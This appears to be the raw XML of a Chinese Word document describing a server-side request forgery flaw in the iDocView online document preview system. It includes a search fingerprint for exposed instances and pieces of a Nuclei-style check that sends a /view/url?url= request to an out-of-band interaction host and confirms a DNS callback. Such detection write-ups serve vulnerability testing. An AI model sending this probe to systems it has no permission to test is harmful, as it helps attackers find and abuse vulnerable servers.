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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I Doc View在线文档预览系统任意文件读取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iDocView是一个在线文档解析应用文件。旨在提供便捷的查看和编辑服务，该系统存在存在服务端请求伪造漏洞。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title=="在线文档预览 - I Doc View"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29425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i-doc-view-ssrf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i-doc-view-ssrf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author: m0be1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 /view/url?url=https://{{interactsh-url}}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Upgrade-Insecure-Requests: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(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0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word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part: interactsh_protocol # Confirms the DNS Interaction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words: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"dns"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7330" cy="2738120"/>
            <wp:effectExtent l="0" t="0" r="11430" b="508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79148"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3B8791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0156933"/>
    <w:rsid w:val="27C930E7"/>
    <w:rsid w:val="3F6A06D7"/>
    <w:rsid w:val="5598579D"/>
    <w:rsid w:val="59461742"/>
    <w:rsid w:val="5E21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2023-12-14T16:25:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-14T17:56:47Z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A5DAA765820141EA845A6CB2890DC609_12</vt:lpwstr>
  </property>
</Properties>
</file>